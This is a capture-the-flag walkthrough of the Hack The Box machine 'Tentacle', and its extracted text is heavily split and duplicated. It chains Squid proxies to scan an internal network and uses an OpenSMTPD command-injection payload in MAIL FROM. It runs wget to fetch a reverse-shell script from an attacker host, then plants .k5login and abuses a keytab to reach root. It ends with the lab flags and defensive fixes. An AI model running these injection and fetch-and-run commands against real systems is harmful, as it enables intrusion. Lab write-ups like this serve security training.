TENTACLE | LINUX | MEDIUM
BHOSA | 15042021
ENUMERATION
113.251.241.10.in-addr.arpa. 259200 IN PTR srvpod01.realcorp.htb.
Nmap
PORT STATE SERVICE VERSION
PORT STATE SERVICE VERSION
22
22
/
/
tcp
tcp
open
open
ssh OpenSSH
ssh OpenSSH
8.0
8.0
(
(
protocol
protocol
2.0
2.0
)
)
|
|
ssh
ssh
-
-
hostkey:
hostkey:
|
|
3072
3072
8
8
d:dd:
d:dd:
18
18
:
:
10
10
:e5:
:e5:
7
7
b:b0:da:a3:fa:
b:b0:da:a3:fa:
14
14
:
:
37
37
:a7:
:a7:
52
52
:
:
7
7
a:
a:
9
9
c
c
(
(
RSA
RSA
)
)
|
|
256
256
f6:a9:
f6:a9:
2
2
e:
e:
57
57
:f8:
:f8:
18
18
:b6:f4:ee:
:b6:f4:ee:
03
03
:
:
41
41
:
:
27
27
:
:
1
1
e:
e:
1
1
f:
f:
93
93
:
:
99
99
(
(
ECDSA
ECDSA
)
)
|
|
_
_
256
256
04
04
:
:
74
74
:dd:
:dd:
68
68
:
:
79
79
:f4:
:f4:
22
22
:
:
78
78
:d8:ce:dd:
:d8:ce:dd:
8
8
b:
b:
3
3
e:
e:
8
8
c:
c:
76
76
:
:
3
3
b
b
(
(
ED25519
ED25519
)
)
53
53
/
/
tcp
tcp
open
open
domain ISC BIND
domain ISC BIND
9.11
9.11
.20
.20
(
(
RedHat Enterprise Linux
RedHat Enterprise Linux
8
8
)
)
|
|
dns
dns
-
-
nsid:
nsid:
|
|
bind
bind.
version:
version:
9 11
9.11
20
.20
-
-
RedHat
RedHat
-
-
9 11
9.11
20
.20
-
-
5
5.
el8
el8
Ssh → PORT 22
Version → OpenSSH 8.0
Not vulnerable
DEAD END
Domain → PORT 53
Version → ISC BIND 9.11.20
1. Zone transfer
Zone transfers are used to copy a domain’s database from the primary
server to the secondary server. If an attacker is able to perform a zone
transfer with the primary or secondary name servers for a domain, the
attacker will be able to view all DNS records for that domain..
Dig
dig
dig
axfr @
axfr @
<
<
ip
ip
>
>
realcorp.htb
realcorp.htb
dig
dig
axfr @
axfr @
<
<
ip
ip
>
>
|
|
_ bind
_ bind
.
.
version:
version:
9.11
9.11
.20
.20
RedHat
RedHat
9.11
9.11
.20
.20
5.
5.
el8
el8
88
88
/
/
tcp
tcp
open
open
kerberos
kerberos
-
-
sec MIT Kerberos
sec MIT Kerberos
(
(
server
server
time
time
:
:
2021
2021
-
-
04
04
-
-
16
16
04
04
:
:
25
25
:
:
26
26
Z
Z
)
)
3128
3128
/
/
tcp
tcp
open
open
http
http
-
-
proxy Squid http proxy
proxy Squid http proxy
4.11
4.11
|
|
_http
_http
-
-
server
server
-
-
header: squid
header: squid
/
/
4.11
4.11
|
|
_http
_http
-
-
title: ERROR: The requested URL could
title: ERROR: The requested URL could
not
not
be retrieved
be retrieved
9090
9090
/
/
tcp closed zeus
tcp closed zeus
-
-
admin
admin
Service Info: Host: REALCORP
Service Info: Host: REALCORP
.
.
HTB
HTB
;
;
OS: Linux
OS: Linux
;
;
CPE:
CPE:
cpe:
cpe:
/
/
o:redhat:enterprise_linux:
o:redhat:enterprise_linux:
8
8
Transfer failed
2. A and PTR Record lookup
DNS and reverse DNS lookup to find some domain names or ip addresss.
Dig
dig
dig
+noall +answer ANY @
+noall +answer ANY @
<
<
dns_ip
dns_ip
>
>
"realcorp.htb"
"realcorp.htb"
New sub domain → ns.realcorp.htb
A record lookup for ns.realcorp.htb
dig
dig
+noall +answer @10.129.175.123
+noall +answer @10.129.175.123
"ns.realcorp.htb"
"ns.realcorp.htb"
new IP address → 10.197.243.77
Sub Domain bruteforcing
As there is a sub domain by the name ns.realcorp.htb there are high
chances that there might be some other sub domains too.
Gobuster
gobuster dns -d
gobuster dns -d
"realcorp.htb"
"realcorp.htb"
-r
-r
"10.129.175.123"
"10.129.175.123"
-w
-w
"/opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt"
"/opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt"
proxy.realcorp.htb
wpad.realcorp.htb
Reverese DNS lookup
A reverse dns lookup on all these domain names returns useful ip addresses.
dig
proxy.realcorp.htb
dig
dig
-x @10.129.175.123
-x @10.129.175.123
"proxy.realcorp.htb"
"proxy.realcorp.htb"
Same ip address a ns.realcorp.htb .
wpad.realcorp.htb
dig
dig
+noall +answer @10.129.175.123
+noall +answer @10.129.175.123
"wpad.realcorp.htb"
"wpad.realcorp.htb"
New ip address → 10.197.243.31
Kerberos sec → 88
Version → MIT Kerberos
searchploit and online exploit
Normal Understanding
Hacktrickz
http-proxy → 3128
Version → Squid http proxy 4.11
Accessing the default page of squid proxy gives us some domain names and
usernames.
j.nakazawa@realcorp.htb
srv01.realcorp.htb
A normal pentesting methodology for squid proxy is to examine if one can
access the localhost of the machine without authentication.
The browser gets stuck when the ip of the machine is requested.
IN order to analyse what is happenig we can chain the request to go
through burp and then to squid proxy.
We can do it eithern with burp or proxychains.
Burp
One must add a upstream proxy server
Now the requests will go through the burp and then via squid proxy.
We can intercept the request and sent the request to the repeater to get a
authentication required.
Loading the html locally gives us a rendered image of the response.
ARGS OF COMMANDS  Burp Proxychains
Proxychains
Procychains is a cmd line utility to configure chained proxies.
Add the following lines to /etc/proxychains.conf .
http
http
10.129
10.129
.175.213
.175.213
3128
3128
Now issue a request and open up wirehsark to listen at tun0.
Following the tcp stream of the request one can see a similar result.
But when the address is http://127.0.0.1
We get a could not be retrieved message.There is no authentication.
This means we can carry a network scan on the localhost using nmap.
Exploitation
Nmap on localhost
1. One hop proxy
Strict chain ... 10.129.175.1233128 ... 127.0.0.1
proxychains -q nmap -sT -n -Pn --top-ports
proxychains -q nmap -sT -n -Pn --top-ports
100
100
"127.0.0.1"
"127.0.0.1"
sT  This makes the nmap to DO A FULL TCP SCAN rather than syn/ack
way of identifying the service.When we sent a syn to the proxy it sents it to
the machine but the syn/ack is not sent back to our machine by the
proxy.So we wont get any up service.
n never do dns resolution.
Pn Treat all hosts as online.nmap sents a icmp packet and tcp request to 80
and 443 to check whether the host is up , in our case icmp packets wont be
sent via proxy and 80 and 443 is closed , so nmap just spits out that host is
offline.So mentioning this argument will make nmap to do service
enumeration by considering the host is online.
https://superuser.com/questions/175428/how-to-ping-when-behind-a-
proxy
We can see that proxy is up in the localhost.This means we have one more
proxy that we can use to test the availability of other ip addresses that we
discovered.
When we try to access proxy.realcorp.htb or wpad.realcorp.htb we get a
proxy auhentication error , similiar to when we tried to access
10.129.175.123 .
Now that we have a new proxy we can use proxychains to connect to
10.129.175.123:3128 and then 127.0.0.1:3128 .
2. 2 hop proxy
Strict chain  10.129.175.1233128 → 127.0.0.13128...
10.197.243.77 
Nmap
proxychains -q nmap -sT -n -Pn --top-ports
proxychains -q nmap -sT -n -Pn --top-ports
100
100
10.197
10.197
.243.77
.243.77
This machine also has a proxy listener , which justifies its name
proxy.realcorp.htb .
Strict chain  10.129.175.1233128 → 127.0.0.13128...
10.197.243.31 
proxychains -q nmap -sT -n -Pn --top-ports
proxychains -q nmap -sT -n -Pn --top-ports
10
10
10.197
10.197
.243.31
.243.31
wpad.realcorp.htb is not accessible via this network or is being denied via
proxy rules.
3. 3 hop proxy
Strict chain  10.129.175.1233128 → 127.0.0.13128...
10.197.243.77 3128  10.197.243.31
As wpad is still not accessible and we also have another proxy out there , it
would be a guess to use proxy.realcorp.htb as a proxto reach out
wpad.realcorp.htb .
/etc/proxychains.conf
[
[
ProxyList
ProxyList
]
]
# add proxy here ...
# add proxy here ...
# meanwile
# meanwile
# defaults set to "tor"
# defaults set to "tor"
#socks5 127.0.0.1 1080
#socks5 127.0.0.1 1080
#socks4 127.0.0.1 9050
#socks4 127.0.0.1 9050
http
http
10.129
10.129
.175
.175
.217
.217
3128
3128
http
http
127.0
127.0
.0
.0
.1
.1
3128
3128
http
http
10.197
10.197
.243
.243
.77
.77
3128
3128
curl
proxychains
proxychains
curl
curl
http://10.197.243.31
http://10.197.243.31
|
|
tee
tee
redhat.html
redhat.html
;
;
firefox
firefox
redhat.html
redhat.html
This returns a red hat default page.
The next step was a pure guess as to try specific domain name as it will
resolve to different page if virtual hosting is enabled in the host.
proxychains
proxychains
curl
curl
http://wpad.realcorp.htb
http://wpad.realcorp.htb
|
|
tee
tee
redhad2.html
redhad2.html
;
;
forefox
forefox
redhat2.html
redhat2.html
This returns us a forbidden page.So there is virtual hosting route for
wpad.realcorp.htb .
Web Proxy Auto-Discovery (wpad) Protocol is a method used by clients to
locate the URL of a configuration file using DHCP and/or DNS discovery
methods.
Again another guess was guessing for the page wpad.dat which is a file
which has the rules for proxy routing.
proxychains
proxychains
curl
curl
http://wpad.realcorp.htb/wpad.dat
http://wpad.realcorp.htb/wpad.dat
|
|
tee
tee
redhat3.html
redhat3.html
;
;
firefox redhat3.html
firefox redhat3.html
A new ip range or subnet 10.241.251.0 .
Bruteforce through the ip range to find which ip has
domain records
We need to find which machines have A record . Reverse dns lookup)
SPECIFIC METHODOLOGY  Dns pentesting methodology
for
for
i
i
in
in
{
{
1
1
..
..
150
150
}
}
;
;
do
do
dig
dig
+noall +answer @10.129.175.217 -x
+noall +answer @10.129.175.217 -x
10.241
10.241
.251.
.251.
${i}
${i}
;
;
done
done
We have a new sub domin.
dig
dig
+noall +answer @10.129.175.217
+noall +answer @10.129.175.217
"srvpod01.realcorp.htb"
"srvpod01.realcorp.htb"
NEW IP address : 10.241.251.113
Running another nmap via proxychains on this machine returns a
vulnerbale smtp service running.
Strict chain  10.129.175.1233128 → 127.0.0.13128...
10.197.243.77 3128  10.241.251.113
proxychains -q nmap -sT -n -Pn --top-ports
proxychains -q nmap -sT -n -Pn --top-ports
10
10
"10.241.251.113"
"10.241.251.113"
Running a version scan on 25 
opensmtpd and openbsd .
smtp exploit
Searchsploit
print
print
(
(
'[*] Connected, sending payload'
'[*] Connected, sending payload'
)
)
s
s
.
.
send
send
(
(
bytes
bytes
(
(
'MAIL FROM:<;{};>\r\n'
'MAIL FROM:<;{};>\r\n'
.
.
format
format
(
(
CMD
CMD
)
)
,
,
'utf-8'
'utf-8'
)
)
)
)
res
res
=
=
s
s
.
.
recv
recv
(
(
1024
1024
)
)
The script is basically a result of poor management of the user
input.smtp is taking the user input without sanitizing becasue of which
we can escape the smtp command using ; and execute our own
command and again use ; to safely execute and exit our command.
Strategy
We initially execute a wget command to download the reverse shell from our
server.
Then sent another command to execute the script.
Make sure port is listening for incoming connections.
It is always advised to run a ping command initially to check the
working of the rce rather than jumping right into reverse shell.
proxychains python3 smtp_rce.py
proxychains python3 smtp_rce.py
"10.241.251.113"
"10.241.251.113"
25
25
'wget
'wget
10.10.14.27/shell.sh -O /tmp/tmux.sh'
10.10.14.27/shell.sh -O /tmp/tmux.sh'
We get a request from the machine requesting the payload.
NOw we need to execute the script.
proxychains python3 smtp_rce.py
proxychains python3 smtp_rce.py
"10.241.251.113"
"10.241.251.113"
25
25
'bash/tmp/tmux.sh'
'bash/tmp/tmux.sh'
We are root in smtp.realcorp.htb.
Privesc
Root in smtp.realcorp.htb → j.nakazawa in
realcorp.htb
Enumerating the box around we can find a weird file in home folder of
j.nakazawa.
.msmtprc
---snip---
---snip---
# RealCorp Mail
# RealCorp Mail
account realcorp
account realcorp
host
host
127.0
127.0
.0
.0
.1
.1
port
port
587
587
from
from
j
j
.
.
nakazawa
nakazawa
@realcorp.htb
@realcorp.htb
user
user
j
j
.
.
nakazawa
nakazawa
password sJB}RM
password sJB}RM
>
>
6
6
Z
Z
~
~
64
64
_
_
<
<
----------Possible password
----------Possible password
tls_fingerprint
tls_fingerprint
C9:
C9:
6
6
A:B9:F6:
A:B9:F6:
0
0
A:D4:
A:D4:
9
9
C:
C:
2
2
B:B9:F6:
B:B9:F6:
44
44
:
:
1
1
F:
F:
30
30
:B8:
:B8:
5
5
E:
E:
5
5
A:D8:
A:D8:
0
0
D:A5:
D:A5:
60
60
---snip---
---snip---
We have a password , possible reuse in ssh login ?
But unfortunately no ssh server lets me in with this password.
But as kerberos is in the box there is a chance that this password might be
useful for getting ticket.
Kerberos enum and walkthrough
Kerberos is a defense mechanism that provides a secure connectivity
between client and service in a untrusted network.
It makes sure that passwords are not transmitted via the network as
someone can sniff it.
Rather it makes use of symmetric keys.
It makes use of a third party application called authentication server(AS
and TGSTicket Granting Server) to authenticate the client and the service.
This meant the client and service could communicate without any exchange
of password or public keys between them.
Detailed explanantion of kerb auth: CONCEPTS ONLY  Kerberos
Every user needs a ticket granted by the TGS to access a service
So we need to install a kerberos client package to carry out requests.
First change the /etc/krb5.conf so that we can mention the tool to find the
AS . Basically we just mentioned the REALM name.
[
[
realms
realms
]
]
REALCORP
REALCORP
.
.
HTB
HTB
=
=
{
{
kdc
kdc
=
=
realcorp
realcorp
.
.
htb:
htb:
88
88
The kerberos client looks for this particular config file to look for realms .
Requesting a token
kinit j.nakazawa@REALCORP.HTB
kinit j.nakazawa@REALCORP.HTB
This command asks for a ticket from the realm REALCORP.HTB , and if there
is a principal called j.nakazawa in the realm then it will either ask for
password of keytab file based on how the prnicipal is configured.
Here we are asked for a password.We enter the password from the .msmrtc
config file and get in as j.nakazawa user in realcorp.htb
We are user j.nakazawa
j.nakazawa → admin
There is another user named admin.
ON running linpeas or a normal manual enum one can find a cron jub being
run by the user admin.
[
[
j
j
.
.
nakazawa
nakazawa
@srv01
@srv01
squid
squid
]
]
$ cat
$ cat
/
/
etc
etc
/
/
crontab
crontab
SHELL
SHELL
=
=
/
/
bin
bin
/
/
bash
bash
PATH
PATH
=
=
/
/
sbin:
sbin:
/
/
bin:
bin:
/
/
usr
usr
/
/
sbin:
sbin:
/
/
usr
usr
/
/
bin
bin
MAILTO
MAILTO
=
=
root
root
# For details see man 4 crontabs
# For details see man 4 crontabs
# Example of job definition:
# Example of job definition:
# .---------------- minute (0 - 59)
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR
sun,mon,tue,wed,thu,fri,sat
sun,mon,tue,wed,thu,fri,sat
# | | | | |
# | | | | |
# * * * * * user-name command to be executed
# * * * * * user-name command to be executed
*
*
*
*
*
*
*
*
*
*
admin
admin
/
/
usr
usr
/
/
local
local
/
/
bin
bin
/
/
log_backup
log_backup
.
.
sh
sh
[
[
j
j
.
.
nakazawa
nakazawa
@srv01
@srv01
squid
squid
]
]
$
$
admin user runs a shell script that rsync data from /var/log/sqquid/* to
/home/admin/ .
Note: Here rsync is used instead of normal copy command , this is to
prevent common wildcard injection attacks.As done in DYNSTR.
Kerberos alternative for authorized file
Kerberos has a feature for ssh users which is more like the authorized_keys
file in linux.
There is a file called .k5login and this file can contain the names of the
users that can access the principal which in this case is the ssh user admin.
One can just enter a name of the user in the file name .k5login which is
present in the home directory.
Once the name is entered for example j.nakzawas , this means that
j.nakzawa user can ssh as admin without creating any other token other
than his own token , which we already generated.
Strategy
We place a file named .k5login in /var/log/squid dir and then feed in the
name j.nakzawa@REALCORP.HTB into the file.
The crontab runs and places the .k5login file into the home directory of
admin.
Now when we ssh in as admin from our attacker machine , kerberos looks
for the name j.nakazawa in .k5login file which we placed and hola we
would be in as user admin.
We are user admin
admin → ROOT
Enumerating the box for files readable by admin,reveals a keytab file.
keytab files are files that are used as part of encryption method of
kerberos.
Anyone who has access to keytab files can use that to access principals
and users.
We can use this keytab file to access the kadmin prompt.
One can use this prompt to create a root user principal.SO when we try to
access the root user using ksu kerberos will ask for the password that was
used to create the root principal , which we have now.
kadmin: addprinc root
kadmin: addprinc root
We are root
CREDENTIALS
Password : sJBRM6Z64_
DEFENSE
Squid proxy was not configured properly because of which one can
enumerate the internal network
Use a default squid proxy confs that comes with the package.
Username and password was exposed from the .msmtrc which led to
kerberos ssh login.
Make sure the passwords are not hardcoded or make sure they are
obfuscated.
crontab of admin user was readable , the script that was being run was also
visible , because of which we understood that contents from a admin
writable folder was being copied to the home directory of admin.This led to
.k5login spoofing.
One should make sure the permissions for scripts and cronjobs must
be set in a manner that only the owner is capable of accessing it.Here the
script and /var/log/squid must be made readable and writable only by
user admin.
admin to root was because of the readble keytab file.
There is clear instruction that keytab file must have protective
permissions but still the user admin came under the group that had read
access of the keytab file that had principal info and permissions such as
admin and changepw for user kadmin which made it possibel for us to
create a user root.
FLAGS
User: 9fe92ac9dba259b31b9aab6aa349cad8
Root: 0162c27af602daf43669f6d033ee39ec
THINGS LEARNT
Squid proxy TENTACLE  http-proxy - 3128
Kerberos CONCEPTS ONLY  Kerberos
Containerized kerberos https://www.confluent.io/blog/containerized-
testing-with-kerberos-and-ssh/